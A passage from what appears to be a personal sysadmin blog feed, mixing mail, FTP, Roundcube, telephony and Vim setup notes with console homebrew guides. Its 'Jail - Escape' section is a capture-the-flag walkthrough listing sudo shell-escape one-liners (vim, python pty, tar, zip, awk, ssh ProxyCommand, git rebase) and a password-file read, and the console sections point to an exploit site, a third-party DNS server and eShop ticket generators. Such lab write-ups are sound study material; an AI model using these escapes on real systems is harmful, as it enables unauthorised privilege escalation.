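        qualifier = "+"  # the default qualifier is "+"
        if term[0] in "+-~?":
            qualifier, term = term[0], term[1:]
        mechanism, _, argument = term.partition(":")
        parsed.append((qualifier, mechanism.lower(), argument))
    return parsed


def _matches(dns, domain, mechanism, argument, ip):
    """Does one mechanism match the connecting IP address?"""
    if mechanism == "all":
        return True
    if mechanism == "ip4":
        # "ip4:1.2.3.4" is a single host; a CIDR suffix would also be accepted
        return ip in ipaddress.ip_network(argument, strict=False)
    if mechanism == "a":
        return str(ip) in lookup(dns, argument or domain, "A")
    if mechanism == "mx":
        # Every MX host of the domain is resolved and compared with the sender
        for mx_host in lookup(dns, argument or domain, "MX"):
            if str(ip) in lookup(dns, mx_host, "A"):
                return True
        return False
    raise ValueError("mechanism not supported by this example: " + mechanism)


def check_host(dns, domain, sender_ip):
    """SPF result for a connection from sender_ip whose MAIL FROM is @domain."""
    ip = ipaddress.ip_address(sender_ip)
    records = [r for r in lookup(dns, domain, "TXT") if r.lower().startswith("v=spf1")]
    if not records:
        return "none"       # the domain publishes no SPF policy
    if len(records) > 1:
        return "permerror"  # RFC 7208 forbids multiple SPF records
    for qualifier, mechanism, argument in parse_spf(records[0]):
        if _matches(dns, domain, mechanism, argument, ip):
            return QUALIFIER_RESULT[qualifier]
    return "neutral"        # no mechanism matched and there was no "all"


if __name__ == "__main__":
    for sender in ("1.2.3.4", "5.6.7.8"):
        print(sender, "->", check_host(SAMPLE_DNS, "domain.tld", sender))
```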
<h1>Backup MX server</h1>
<p>For the backup mail server to accept mail for the domain, the domain and the full set of valid email addresses must be added to its Postfix configuration.</p>
<div class="highlight"><pre><span></span><code><span class="err"># vim /etc/postfix/main.cf</span>
<span class="err">relay_domains = $mydestination, domain.tld</span>
<span class="err">relay_recipient_maps = hash:/etc/postfix/relay_recipients</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="err"># vim /etc/postfix/relay_recipients</span>
<span class="err">mail@domain.tld OK</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code>postmap /etc/postfix/relay_recipients
service postfix restart
</code></pre></div>3DS2010-12-03T10:20:00+01:002010-12-03T10:20:00+01:00nlegalltag:blog.nlegall.fr,2010-12-03:/3ds.html<blockquote>
<p>The links below are provided for information only. Under no circumstances can I be held responsible for your downloads.</p>
</blockquote>
<h1>CFW</h1>
<p>The first step is to install a custom firmware (CFW). This guide covers all the steps required for the installation. It is also updated very frequently.</p>
<p><a href="https://3ds.guide/">https://3ds.guide/</a></p>
<p>The CFW installed by this guide is Luma3DS. It allows installing homebrew and therefore CIA/3DS files.</p>
<p><a href="https://github.com/d0k3/GodMode9">https://github.com/d0k3/GodMode9</a>
<a href="https://github.com/AuroraWright/Luma3DS">https://github.com/AuroraWright/Luma3DS</a></p>
<h1>Homebrew</h1>
<p>A set of programs made by the community. They are very varied and add a large number of features to our favorite console: themes, CIA file installation, NAND management, save file editing...</p>
<h2>The most useful</h2>
<table>
<thead>
<tr>
<th></th>
<th>Nom</th>
<th>Usage</th>
</tr>
</thead>
<tbody>
<tr>
<td><img alt="" src="https://img.nlegall.fr/Fcx9Fqvx"></td>
<td>hblauncher_loader v1.2</td>
<td>Core component for launching programs</td>
</tr>
<tr>
<td><img alt="" src="https://img.nlegall.fr/P8rAyVLO"></td>
<td>Free eShop</td>
<td>Open source eShop clone</td>
</tr>
<tr>
<td><img alt="" src="https://img.nlegall.fr/4NuSgLoB"></td>
<td>FBI</td>
<td>Installs CIA files</td>
</tr>
<tr>
<td><img alt="" src="https://img.nlegall.fr/UTxzCQRx"></td>
<td>Luma3DS Updater</td>
<td>Updater for Luma3DS releases</td>
</tr>
<tr>
<td><img alt="" src="https://img.nlegall.fr/zRN8mlps"></td>
<td>TIKdevil</td>
<td>Ticket Generator</td>
</tr>
<tr>
<td><img alt="" src="https://img.nlegall.fr/haJZbOT4"></td>
<td>tikShop</td>
<td>Generate missing tickets and launch the eShop</td>
</tr>
</tbody>
</table>
<h2>Database</h2>
<p>A large part, if not all, of the available homebrews are listed in this database. It also gives the size and a download link for each one.</p>
<p><a href="https://titledb.com/">https://titledb.com/</a></p>
<h2>CIA</h2>
<p>Probably the reason you installed a CFW on your console: making it possible to install the famous CIA files. The first link lets you retrieve the encTitleKeys.bin file. It is essential if you want to use the following homebrews.</p>
<ul>
<li><a href="https://3ds.titlekeys.com/">https://3ds.titlekeys.com/</a></li>
<li><a href="https://gbatemp.net/threads/release-shameless-an-easy-to-use-eshop-ticket-qr-code-generator-for-fbi.424469/">https://gbatemp.net/threads/release-shameless-an-easy-to-use-eshop-ticket-qr-code-generator-for-fbi.424469/</a></li>
<li><a href="https://gbatemp.net/threads/release-socketpunch-fbi-network-cia-installer-for-android-pc.412174/">https://gbatemp.net/threads/release-socketpunch-fbi-network-cia-installer-for-android-pc.412174/</a></li>
<li><a href="https://gbatemp.net/threads/wip-freeshop-open-source-eshop-clone.426573/">https://gbatemp.net/threads/wip-freeshop-open-source-eshop-clone.426573/</a></li>
<li><a href="https://gbatemp.net/threads/release-cdn-fx-the-ultimate-eshop-content-downloader.414004/">https://gbatemp.net/threads/release-cdn-fx-the-ultimate-eshop-content-downloader.414004/</a></li>
</ul>
<p><a href="https://gbatemp.net/threads/release-notifymii-homebrew-notification-manager.423334/">https://gbatemp.net/threads/release-notifymii-homebrew-notification-manager.423334/</a></p>
<h2>Emulators</h2>
<p><a href="https://gbatemp.net/threads/tutorial-the-homebrew-launcher-emulators-all-in-one-noobs-guide-snes-gb-gbc-gba-nes.395961/">https://gbatemp.net/threads/tutorial-the-homebrew-launcher-emulators-all-in-one-noobs-guide-snes-gb-gbc-gba-nes.395961/</a></p>
<h1>Themes</h1>
<ol>
<li>Open FBI</li>
<li>Select TitleDB</li>
<li>Find CHMM in the list and install</li>
<li>Download a theme from 3DSThem.es</li>
<li>Put the ZIP file you've downloaded into the /Themes folder in your SD Card (create it if it doesn't exist);</li>
<li>Boot up CHMM2, and install the theme</li>
</ol>
<p>Useful links:</p>
<ul>
<li><a href="https://3dsthem.es/">https://3dsthem.es/</a></li>
<li><a href="https://gbatemp.net/threads/every-3ds-save-editor.396697/">https://gbatemp.net/threads/every-3ds-save-editor.396697/</a></li>
<li><a href="https://gbatemp.net/threads/tutorial-making-custom-furniture-in-animal-crossing-new-leaf.480595/">https://gbatemp.net/threads/tutorial-making-custom-furniture-in-animal-crossing-new-leaf.480595/</a></li>
</ul>Jail - Escape2010-12-03T10:20:00+01:002010-12-03T10:20:00+01:00nlegalltag:blog.nlegall.fr,2010-12-03:/jail-escape.html<p>https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf
https://d00mfist.gitbooks.io/ctf/escaping_restricted_shell.html</p>
<h1>User 1</h1>
<p>app-script-ch14@challenge02:~$ vim --cmd "set shell=/bin/bash" --cmd "shell"</p>
<h1>User 2</h1>
<div class="highlight"><pre><span></span><code>app-script-ch14@challenge02:~$ echo $PATH
/challenge/app-script/ch14/step1/
app-script-ch14@challenge02:~$ export PATH=/bin:/usr/bin
app-script-ch14@challenge02:~$ id
uid=1314(app-script-ch14) gid=1314(app-script-ch14) groups=1314(app-script-ch14),100(users)
app-script-ch14@challenge02:~$ sudo -l
Matching Defaults entries for app-script-ch14 on challenge02:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, !mail_always, !mail_badpass, !mail_no_host, !mail_no_perms, !mail_no_user

User app-script-ch14 may run the following commands on challenge02:
    (app-script-ch14-2) NOPASSWD: /usr/bin/python
app-script-ch14@challenge02:~$ sudo -u app-script-ch14-2 python
Python 2.7.15+ (default, Oct 7 2019, 17:39:04)
[GCC 7.4.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
&gt;&gt;&gt; import pty
&gt;&gt;&gt; pty.spawn('/bin/bash')
</code></pre></div>
<h1>User 3</h1>
<p>https://gtfobins.github.io/gtfobins/tar/</p>
<p>app-script-ch14-2@challenge02:~$ sudo -u app-script-ch14-3 tar xf /dev/null -I '/bin/bash -c "bash <&2 1>&2"'</p>
<h1>User 4</h1>
<p>app-script-ch14-3@challenge02:~$ sudo -l
Matching Defaults entries for app-script-ch14-3 on challenge02:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
!mail_always, !mail_badpass, !mail_no_host, !mail_no_perms, !mail_no_user</p>
<p>User app-script-ch14-3 may run the following commands on challenge02:
(app-script-ch14-4) NOPASSWD: /usr/bin/zip</p>
<p>sudo -u app-script-ch14-4 zip /tmp/test.zip /tmp/jk.sh -T --unzip-command="sh -c /bin/bash"</p>
<h1>USER 5</h1>
<p>sudo -u app-script-ch14-5 awk '{system("/bin/bash");}'</p>
<h1>USER 6</h1>
<p>sudo -u app-script-ch14-6 gdb</p>
<blockquote>
<p>shell</p>
</blockquote>
<h1>User 7</h1>
<p>sudo -u app-script-cha14-7 pico -s "/bin/bash"
/bin/bash CTRL+T</p>
<h1>User 8</h1>
<p>/tmp/superscript : /bin/bash - chmod +x /tmp/superscript
sudo -u app-script-ch14-8 scp -S /tmp/superscript 127.0.0.1: 127.0.0.1:</p>
<h1>User 9</h1>
<p>sudo -u app-script-ch14-9 env /bin/bash</p>
<h1>User 10</h1>
<p>sudo -u app-script-ch14-10 ssh -o ProxyCommand=';bash 0<&2 1>&2' 127.0.0.1</p>
<h1>User 11</h1>
<div class="highlight"><pre><span></span><code>sudo -u app-script-cha14-11 git help status
!/bin/bash
mkdir /tmp/qspod
cd /tmp/qspod
git init
touch a
git add .
git commit -m "a"
chmod -R 777 .git
sudo -u app-script-ch14-11 git rebase --interactive --exec "/bin/bash" HEAD
</code></pre></div>
<h1>User 12</h1>
<div class="highlight"><pre><span></span><code>vim /tmp/po {/bin/bash}
chmod 777 /tmp/po
sudo -u app-script-ch14-13 /usr/bin/script /tmp/po
</code></pre></div>
<h1>User 13</h1>
<p>mapfile -t a < ../.passwd
echo $a</p>My First Review2010-12-03T10:20:00+01:002010-12-03T10:20:00+01:00nlegalltag:blog.nlegall.fr,2010-12-03:/my-first-review.html<p>Following is a review of my favorite mechanical keyboard.</p>PureFTP2010-12-03T10:20:00+01:002010-12-03T10:20:00+01:00nlegalltag:blog.nlegall.fr,2010-12-03:/pureftp.html<p><img alt="" src="https://img.nlegall.fr/yiVJKBEe"></p>
<h1>Overview</h1>
<p>Pure-FTPd is a free (BSD), secure, production-quality and standard-conformant FTP server. It doesn't provide useless bells and whistles, but focuses on efficiency and ease of use. It provides simple answers to common needs, plus unique useful features for personal users as well as hosting providers. </p>
<h1>Installation</h1>
<div class="highlight"><pre><span></span><code>apt install pure-ftpd pureadmin
</code></pre></div>
<h1>Configuration</h1>
<p>This configuration gives an FTP server with virtual users (completely independent of the Linux accounts) and TLS-encrypted connections and transfers (explicit TLS on port 21).</p>
<h2>User</h2>
<p>Repeat this operation once for each user that should be allowed to connect to the server.</p>
<div class="highlight"><pre><span></span><code>pure-pw useradd user -u ftpuser -d /home/ftpusers/user -j
pure-pw passwd user -m
pure-pw mkdb
</code></pre></div>
<h2>SSL/TLS</h2>
<p>Enables encryption of the commands and of the data sent to and received from the server.</p>
<div class="highlight"><pre><span></span><code>mkdir -p /etc/ssl/private
openssl dhparam -out /etc/ssl/private/pure-ftpd-dhparams.pem <span class="m">2048</span>
openssl req -x509 -nodes -newkey rsa:2048 -sha256 -keyout /etc/ssl/private/pure-ftpd.pem -out /etc/ssl/private/pure-ftpd.pem
chmod <span class="m">600</span> /etc/ssl/private/*.pem
<span class="c1"># Only TLS is allowed</span>
<span class="nb">echo</span> <span class="m">2</span> > /etc/pure-ftpd/conf/TLS
/etc/init.d/pure-ftpd restart
</code></pre></div>Roundcubemail2010-12-03T10:20:00+01:002010-12-03T10:20:00+01:00nlegalltag:blog.nlegall.fr,2010-12-03:/roundcubemail.html<h1>Overview</h1>
<p><img alt="" src="https://img.nlegall.fr/hgBMeCUM"></p>
<p>Roundcube is a web-based IMAP email client. Roundcube's most prominent feature is the pervasive use of Ajax technology. After about two years of development, the first stable release of Roundcube was announced in early 2008.</p>
<p>Roundcube is written in PHP and can be employed in conjunction with a LAMP "stack"; any other operating system that supports PHP is supported as well. The web server needs access to the IMAP server hosting the email and to an SMTP server to be able to send mail.</p>
<p>Roundcube is free and open-source software subject to the terms of the GNU General Public License (GPL) with exceptions for skins and plugins.</p>
<h1>Installation</h1>
<h2>Prerequisites</h2>
<div class="highlight"><pre><span></span><code>apt-get install php5-fpm php5-mysql php5-pspell php5-curl
</code></pre></div>
<h2>Roundcubemail</h2>
<p>Since distribution packages are often out of date, we take the latest stable version directly.</p>
<div class="highlight"><pre><span></span><code>wget http://sourceforge.net/projects/roundcubemail/files/latest/download?source<span class="o">=</span>files -O roundcubemail.tar.gz
tar -zxvf roundcubemail.tar.gz -C /var/www/html/
mv /var/www/html/roundcubemail-* /var/www/html/roundcubemail
chown -R www-data:root /var/www/html/roundcubemail
</code></pre></div>
<h2>Web server configuration</h2>
<h2>PHP</h2>
<div class="highlight"><pre><span></span><code><span class="x">upload_max_filesize = 50M</span>
<span class="x">post_max_size = 50M</span>
</code></pre></div>
<h2>Apache</h2>
<div class="highlight"><pre><span></span><code><span class="nt"><VirtualHost</span> <span class="s">*:80</span><span class="nt">></span>
<span class="nb">ServerName</span> roundcube.hostname.tld
<span class="nb">ServerAdmin</span> admin@hostname.tld
<span class="nb">DocumentRoot</span> <span class="sx">/var/www/html/roundcubemail</span>
<span class="nt"><Directory</span> <span class="s">/var/www/html/roundcubemail</span><span class="nt">></span>
<span class="nb">AllowOverride</span> <span class="k">All</span>
<span class="nb">Order</span> Allow,Deny
<span class="nb">Allow</span> from <span class="k">All</span>
<span class="nt"></Directory></span>
<span class="nt"></VirtualHost></span>
</code></pre></div>
<h2>nginx</h2>
<div class="highlight"><pre><span></span><code><span class="k">server</span> <span class="p">{</span>
<span class="kn">listen</span> <span class="mi">80</span><span class="p">;</span>
<span class="kn">server_name</span> <span class="s">roundcube.hostname.tld</span><span class="p">;</span>
<span class="kn">root</span> <span class="s">/var/www/html/roundcubemail</span><span class="p">;</span>
<span class="kn">index</span> <span class="s">index.php</span> <span class="s">index.html</span><span class="p">;</span>
<span class="kn">client_max_body_size</span> <span class="s">50M</span><span class="p">;</span>
<span class="kn">location</span> <span class="p">~</span> <span class="sr">^/favicon.ico$</span> <span class="p">{</span>
<span class="kn">root</span> <span class="s">/var/www/html/roundcubemail/web/skins/default/images</span><span class="p">;</span>
<span class="kn">log_not_found</span> <span class="no">off</span><span class="p">;</span>
<span class="kn">access_log</span> <span class="no">off</span><span class="p">;</span>
<span class="kn">expires</span> <span class="s">max</span><span class="p">;</span>
<span class="p">}</span>
<span class="kn">location</span> <span class="p">=</span> <span class="s">/robots.txt</span> <span class="p">{</span>
<span class="kn">allow</span> <span class="s">all</span><span class="p">;</span>
<span class="kn">log_not_found</span> <span class="no">off</span><span class="p">;</span>
<span class="kn">access_log</span> <span class="no">off</span><span class="p">;</span>
<span class="p">}</span>
<span class="kn">location</span> <span class="p">~</span> <span class="sr">^/(README|INSTALL|LICENSE|CHANGELOG|UPGRADING)$</span> <span class="p">{</span>
<span class="kn">deny</span> <span class="s">all</span><span class="p">;</span>
<span class="p">}</span>
<span class="kn">location</span> <span class="p">~</span> <span class="sr">^/(bin|SQL)/</span> <span class="p">{</span>
<span class="kn">deny</span> <span class="s">all</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1"># Deny all attempts to access hidden files such as .htaccess or .htpasswd.</span>
<span class="kn">location</span> <span class="p">~</span> <span class="sr">/\.</span> <span class="p">{</span>
<span class="kn">deny</span> <span class="s">all</span><span class="p">;</span>
<span class="kn">access_log</span> <span class="no">off</span><span class="p">;</span>
<span class="kn">log_not_found</span> <span class="no">off</span><span class="p">;</span>
<span class="p">}</span>
<span class="kn">location</span> <span class="p">~</span> <span class="sr">\.php$</span> <span class="p">{</span>
<span class="kn">try_files</span> <span class="nv">$uri</span> <span class="p">=</span><span class="mi">404</span><span class="p">;</span>
<span class="kn">include</span> <span class="s">/etc/nginx/fastcgi_params</span><span class="p">;</span>
<span class="kn">fastcgi_pass</span> <span class="n">127.0.0.1</span><span class="p">:</span><span class="mi">9000</span><span class="p">;</span>
<span class="kn">fastcgi_param</span> <span class="s">SCRIPT_FILENAME</span> <span class="nv">$document_root$fastcgi_script_name</span><span class="p">;</span>
<span class="kn">fastcgi_index</span> <span class="s">index.php</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div>
<h2>Database</h2>
<div class="highlight"><pre><span></span><code>mysql -u root -p
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="k">CREATE</span> <span class="k">DATABASE</span> <span class="n">roundcube</span><span class="p">;</span>
<span class="k">GRANT</span> <span class="k">ALL</span> <span class="k">PRIVILEGES</span> <span class="k">ON</span> <span class="n">roundcube</span><span class="p">.</span><span class="o">*</span> <span class="k">TO</span> <span class="n">roundcube</span><span class="o">@</span><span class="n">localhost</span> <span class="n">IDENTIFIED</span> <span class="k">BY</span> <span class="ss">"password"</span><span class="p">;</span>
<span class="n">FLUSH</span> <span class="k">PRIVILEGES</span><span class="p">;</span>
<span class="n">quit</span>
</code></pre></div>
<h1>Configuration</h1>
<p>http://roundcube.hostname.tld</p>
<h1>Plugins</h1>
<p>To install a plugin:</p>
<div class="highlight"><pre><span></span><code><span class="nb">cd</span> /var/www/html/roundcubemail/plugins
wget url_du_pluggin
tar xzfv pluggin.tar.gz
<span class="c1"># vim ../config/config.inc.php</span>
</code></pre></div>
<p>http://trac.roundcube.net/wiki/Dev_Encryption
http://mattrude.com/projects/roundcube-fail2ban-plugin/
https://github.com/cosminadrianpopescu/markdown_editor
http://trac.roundcube.net/browser/github/plugins/emoticons
http://www.stremlau.net/html5_notifier/
http://trac.roundcube.net/browser/github/plugins/vcard_attachments
https://github.com/kepi/show-gravatar
http://trac.roundcube.net/browser/github/plugins/password
https://plugins.roundcube.net/packages/johndoh/sauserprefs
https://github.com/northox/roundcube-yubikey-plugin
https://github.com/eagle00789/RC_Filters</p>TOIP2010-12-03T10:20:00+01:002010-12-03T10:20:00+01:00nlegalltag:blog.nlegall.fr,2010-12-03:/toip.html<h1>Definitions</h1>
<p><strong>VoIP</strong>: the concept of transporting voice over an IP network</p>
<p><strong>ToIP</strong>: a telephony solution built on an IP network. It may rely on VoIP from end to end.</p>
<p><strong>RTC</strong>: Réseau téléphonique commuté, the public switched telephone network (PSTN)</p>
<p><strong>RNIS</strong>: Réseau numérique à intégration de service, i.e. ISDN</p>
<p><strong>MIC</strong>: Modulation d'impulsion codée (PCM). Carries the content of a set of 64 kbit/s channels over a single physical link.</p>
<p><strong>SDH</strong>: Synchronous Digital Hierarchy. The multiplexing of a set of MIC (PCM) frames.</p>
<p><strong>Signalling</strong>: all the information carried in addition to the voice itself.</p>
<p><strong>Erlang</strong>: unit of measure corresponding to the average usage time of a telephone line over a one-hour interval.</p>
<ul>
<li>Computing the number of Erlangs (times in hours): E = (number of external calls x average call duration) / time interval considered</li>
<li>Choose the acceptable blocking (loss) probability threshold</li>
<li>Look the result up in the Erlang table</li>
</ul>
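<p>The three steps above, worked through as an added example that is not part of the original notes: a POSIX shell script (floating-point arithmetic delegated to awk) that computes the offered traffic E with the formula given, then evaluates the Erlang B blocking probability for a given number of lines instead of reading it off a printed Erlang table, and finds the smallest number of lines that meets a blocking target. The function names and the call figures (200 external calls of 3 minutes within one hour) are constructed for the example.</p>

```shell
#!/bin/sh
# Added example (not from the original notes): Erlang traffic and Erlang B.
# The notes give E = (calls x mean duration) / interval and then say
# "look up the Erlang table"; these functions compute that table entry.
export LC_ALL=C

# erlang_traffic CALLS MEAN_DURATION INTERVAL
#   Offered traffic in Erlangs. Duration and interval must share a unit
#   (hours in the notes; minutes work as well since the unit cancels).
erlang_traffic() {
    awk -v calls="$1" -v dur="$2" -v interval="$3" \
        'BEGIN { printf "%.2f\n", (calls * dur) / interval }'
}

# erlang_b TRAFFIC LINES
#   Blocking probability for TRAFFIC Erlangs offered to LINES circuits,
#   via the standard recursion B(0)=1, B(n) = A*B(n-1) / (n + A*B(n-1)).
erlang_b() {
    awk -v A="$1" -v N="$2" 'BEGIN {
        b = 1
        for (n = 1; n <= N; n++) b = (A * b) / (n + A * b)
        printf "%.4f\n", b
    }'
}

# lines_needed TRAFFIC MAX_BLOCKING
#   Smallest number of lines whose blocking probability is at or below
#   MAX_BLOCKING (e.g. 0.01 for 1%). Capped at 10000 lines as a safety bound.
lines_needed() {
    awk -v A="$1" -v target="$2" 'BEGIN {
        b = 1
        for (n = 1; n <= 10000; n++) {
            b = (A * b) / (n + A * b)
            if (b <= target) { print n; exit }
        }
        print "-1"   # only reached for absurd inputs
    }'
}

# Constructed scenario: 200 external calls per hour, 3 minutes each,
# observed over a 60-minute interval -> 10 Erlangs.
e=$(erlang_traffic 200 3 60)
echo "Offered traffic: $e Erlangs"
echo "Blocking with 10 lines: $(erlang_b "$e" 10)"
echo "Lines needed for 1% blocking: $(lines_needed "$e" 0.01)"
```

<p>With 10 Erlangs offered to 10 lines roughly one call in five is blocked; reaching the 1% loss threshold takes 18 lines, which is the figure a printed Erlang B table gives for that row.</p>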
<p><strong>AN</strong>: Access network</p>
<p><strong>POTS</strong>: Plain old telephone service</p>
<p><strong>H.323</strong>: a suite of protocols in charge of call signalling over IP networks. It is standardised, but implementations differ between the main vendors; in that case SIP is the better choice.</p>
<p><strong>SIP</strong>: Session Initiation Protocol. A protocol from the Internet world, widespread and standardised (RFC 3261). Runs over UDP.</p>
<ul>
<li>SIP Registrar: the equipment responsible for registering the available clients of its SIP domain (status and IP address)</li>
<li>SIP Proxy: the User Agent Client's point of contact, which lets it learn the address of the User Agent Server it is looking for</li>
</ul>
<p><strong>Gatekeeper</strong>: provides the IP address of the called party's phone as well as the call authorisation. Without this equipment, no external call is possible.</p>
<p><strong>NGN</strong>: Next Generation Network. A single network carrying both PSTN traffic and data.</p>
<p><strong>Media gateway</strong>: converts audio/video streams between different communication networks.</p>
<p><strong>Jitter</strong>: variation in latency.</p>
<p><strong>Electrical echo</strong>: echo caused by the transport technology</p>
<p><strong>Acoustic echo</strong>: echo caused by the microphone picking up the sound</p>
<p><strong>PABX</strong>: Private Automatic Branch eXchange. Manages the organisation's internal and external communications. IP version -> IPBX</p>
<h1>Switching levels</h1>
<h2>CAA</h2>
<p><em>Commutateur à autonomie d'acheminement</em> (local exchange)</p>
<p>Connects subscribers within the same geographical area.</p>
<h2>CTS (primary/secondary)</h2>
<p><em>Centre de transit</em> (transit exchange)</p>
<p>Routes calls between several CAAs.</p>
<h2>CTI</h2>
<p><em>Centre de transit international</em> (international transit exchange)</p>
<p>Routes international calls.</p>
<h1>Voice digitisation</h1>
<p>The 300 to 3400 Hz band is sampled. Each sample is coded on 8 bits every 125 μs, i.e. 8000 samples per second, so a 64 kbit/s line is needed to carry one call (8 x 8000 = 64000).</p>
<h1>Communication</h1>
<h2>Voice transport</h2>
<p>The delivery delay must be as short and as constant as possible, and packet order must be preserved. The two protocols used are RTP (Real-time Transport Protocol, UDP) and RTCP (Real-time Control Protocol, TCP).</p>
<p>A mixer centralises the RTP packets of several participants: conferencing.</p>
<p>A translator acts on RTP packets to allow a change of encoding and the crossing of firewalls (multicast - unicast).</p>
<h2>Optimal thresholds</h2>
<table>
<thead>
<tr>
<th></th>
<th>Acceptable threshold</th>
<th>Critical threshold</th>
</tr>
</thead>
<tbody>
<tr>
<td>Packet loss</td>
<td>&lt;1%</td>
<td>&lt;3%</td>
</tr>
<tr>
<td>Latency</td>
<td>&lt;100 ms</td>
<td>&lt;200 ms</td>
</tr>
<tr>
<td>Jitter</td>
<td>&lt;40 ms</td>
<td>&lt;75 ms</td>
</tr>
</tbody>
</table>
<h1>Quality of service</h1>
<p><em>Requires support for the 802.1p, 802.1Q, RSVP... protocols</em></p>
<p>It makes it possible to cap bandwidth usage and to prioritise flows.</p>
<p><img alt="" src="https://lut.im/37bDb4KrbD/dH9kyGgfxv1Z8AXj"></p>
<p>For voice, this provides:</p>
<ul>
<li>End-to-end delay kept to a minimum</li>
<li>Jitter as low as possible</li>
<li>Guaranteed bandwidth</li>
</ul>Vim2010-12-03T10:20:00+01:002010-12-03T10:20:00+01:00nlegalltag:blog.nlegall.fr,2010-12-03:/vim.html<h2>Installing the plugin manager</h2>
<div class="highlight"><pre><span></span><code>git clone https://github.com/VundleVim/Vundle.vim.git ~/.vim/bundle/Vundle.vim
vim ~/.vimrc
</code></pre></div>
<div class="highlight"><pre><span></span><code> <span class="k">set</span> <span class="nb">nocompatible</span> <span class="c">" be iMproved, required</span>
<span class="k">filetype</span> off <span class="c">" required</span>
<span class="c"> " set the runtime path to include Vundle and initialize</span>
<span class="k">set</span> <span class="nb">rtp</span><span class="p">+=~</span><span class="sr">/.vim/</span>bundle/Vundle.<span class="k">vim</span>
<span class="k">call</span> vundle#begin<span class="p">()</span>
<span class="c"> " alternatively, pass a path where Vundle should install plugins</span>
<span class="c"> "call vundle#begin('~/some/path/here')</span>
<span class="c"> " let Vundle manage Vundle, required</span>
Plugin <span class="s1">'VundleVim/Vundle.vim'</span>
<span class="c"> " Add your plugins here</span>
<span class="c"> " All of your Plugins must be added before the following line</span>
<span class="k">call</span> vundle#<span class="k">end</span><span class="p">()</span> <span class="c">" required</span>
<span class="k">filetype</span> plugin indent <span class="k">on</span> <span class="c">" required</span>
</code></pre></div>
<h2>Colorscheme</h2>
<p>Add the following line to ~/.vimrc:</p>
<div class="highlight"><pre><span></span><code>Plugin <span class="s1">'mhartington/oceanic-next'</span>
</code></pre></div>
<p>and</p>
<div class="highlight"><pre><span></span><code><span class="c">" Theme</span>
<span class="nb">syntax</span> enable
<span class="k">set</span> <span class="nb">t_Co</span><span class="p">=</span><span class="m">256</span>
<span class="k">colorscheme</span> OceanicNext
<span class="k">set</span> <span class="nb">background</span><span class="p">=</span><span class="nb">dark</span>
</code></pre></div>
<p>Then run: <code>vim +PluginInstall +qall</code></p>
<h2>Missing syntax files</h2>
<h3>nginx</h3>
<div class="highlight"><pre><span></span><code><span class="nb">cd</span> ~
wget -O nginx.vim http://www.vim.org/scripts/download_script.php<span class="se">\?</span>src_id<span class="se">\=</span><span class="m">19394</span>
mkdir -p ~/.vim/syntax
mv nginx.vim ~/.vim/syntax/
<span class="c1"># vim ~/.vim/filetype.vim</span>
au BufRead,BufNewFile /etc/nginx/*,/usr/local/nginx/conf/* <span class="k">if</span> <span class="p">&</span><span class="nv">ft</span> <span class="o">==</span> <span class="s1">''</span> <span class="p">|</span> setfiletype nginx <span class="p">|</span> endif
</code></pre></div>WiiU2010-12-03T10:20:00+01:002010-12-03T10:20:00+01:00nlegalltag:blog.nlegall.fr,2010-12-03:/wiiu.html<p><img alt="" src="https://img.nlegall.fr/hnyAs55a"></p>
<p>The Wii U (ウィー ユー, Wī Yū?) is a video game console sold by Nintendo, the successor to the Wii. It was released on 18 November 2012 in North America, 30 November 2012 in Europe and 8 December 2012 in Japan. The first eighth-generation console to be released, it competes with the PlayStation 4 and the Xbox One.</p>
<p>Since the latest firmware (5.5.1) has a hack, the console becomes all the more interesting. You can run games (region-free where possible) and the available homebrew, and back up your games to USB storage or an SD card.</p>
<h1>Vocabulary</h1>
<ul>
<li>Homebrew: games or software produced by consumers for proprietary gaming platforms</li>
<li>NAND: flash memory</li>
<li>sysNAND: the NAND holding all the system software: operating system, bootloader, etc.</li>
<li>redNAND: a copy of your sysNAND's NAND on the SD card; it protects you against mistakes or against installing bad titles (JAP games on an EU console) and the like. Requires a large-capacity SD card (the size depends on your Wii U version).</li>
</ul>
<h1>SD card</h1>
<p>The advantage of an SD card is its low cost for a large capacity. However, Windows cannot format large SD cards as FAT32. You therefore have to use the following two utilities to do so and make the card usable by the Wii U.</p>
<p>http://www.touslesdrivers.com/index.php?v_page=23&v_code=34812
http://www.ridgecrop.demon.co.uk/index.htm?fat32format.htm</p>
<div class="highlight"><pre><span></span><code><span class="err">fat32format -c128 LETTRE:</span>
</code></pre></div>
<h1>Homebrew</h1>
<p>Copy all of the following files to the root of the SD card:</p>
<p>https://www.dropbox.com/s/pc93l60jbuwqawi/Archive.zip?dl=0</p>
<p>Go to the console settings, then network settings, and change the DNS to <code>107.211.140.065</code></p>
<p>Launch the console's web browser. The cookies must be cleared first, every time, before visiting http://googiehax.xyz/index.html.</p>
<p>Select your console's firmware version, then choose Homebrew.</p>
<p>The console should play a video, then show a white screen. The Homebrew Launcher menu should then appear.</p>
<p>A base set of homebrew will be available; if you want to add more, go to http://www.wiiubru.com/appstore/#/ and put them on the SD card in the <code>SD:/wiiu/apps/HOMEBREWNAME</code> folder.</p>
<p>Enjoy :D</p>
<h2>Useful homebrew</h2>
<table>
<thead>
<tr>
<th></th>
<th>Name</th>
<th>Purpose</th>
</tr>
</thead>
<tbody>
<tr>
<td><img alt="" src="https://img.nlegall.fr/evTfExBz"></td>
<td>Loadiine GX2</td>
<td>Runs Wii U games</td>
</tr>
<tr>
<td><img alt="" src="https://img.nlegall.fr/Obnks0Ap"></td>
<td>HB App Store</td>
<td>Adds homebrew directly onto the SD card</td>
</tr>
<tr>
<td><img alt="" src="https://img.nlegall.fr/zH7K0yCy"></td>
<td>FTPiiU</td>
<td>FTP server (send and receive)</td>
</tr>
<tr>
<td><img alt="" src="https://img.nlegall.fr/Ol03DJpN"></td>
<td>tik2sd</td>
<td>Retrieves the tickets of the games present on the Wii U</td>
</tr>
<tr>
<td><img alt="" src="https://img.nlegall.fr/yZuCILrk"></td>
<td>OurLoader</td>
<td>Region-free loading of a physical game</td>
</tr>
<tr>
